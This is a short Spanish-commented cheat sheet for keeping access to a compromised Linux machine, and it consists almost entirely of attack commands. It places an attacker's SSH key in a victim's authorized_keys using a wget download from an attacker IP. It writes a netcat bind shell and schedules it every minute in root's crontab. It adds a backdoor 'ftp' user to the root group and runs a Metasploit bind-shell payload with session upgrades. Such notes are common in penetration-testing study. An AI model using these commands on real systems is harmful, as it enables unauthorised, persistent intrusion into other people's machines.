**ssh-keygen** -t rsa -b 4096
*# En caso de que se solicite una contraseña tenemos la opción de dejarlo en blanco*
**ssh-copy-id** *<victim-user>***@***<target-ip-or-hostname>
# Se solicitará la contraseña del usuario*
**ssh** *<victim-user>***@***<target-ip-or-hostname>*
**ssh-keygen** -t rsa -b 4096
*# En caso de que se solicite una contraseña tenemos la opción de dejarlo en blanco*
**cd** ~/.ssh/
**
**python3** -m http.server 80
*# Alternativa con Python2.7*
**python2** -m SimpleHTTPServer 80
**wget** http://*<attacker-ip>/id_rsa.pub*
**cat** *id_rsa.pub >> .ssh/authorized_keys*
**echo** 'nc -lkvnp 4443 -e /bin/bash >/dev/null &' > /tmp/bindshell
**echo '*** * * * * /tmp/bindshell' | sudo tee -a /var/spool/cron/crontabs/root
**adduser** -m ****user -s /bin/bash **ftp**
**passwd** ftp
**usermod** -aG root **ftp**
**use** payload/generic/shell_bind_tcp
**set** RHOST <target-ip>
**set** LPORT <local-port>
**exploit**
*# CTRL + Z o escribe 'background' para poner la sesión previamente obtenida en segundo plano*
**sessions** -l
**
**sessions** -u <session-id>
**sessions** <session-id>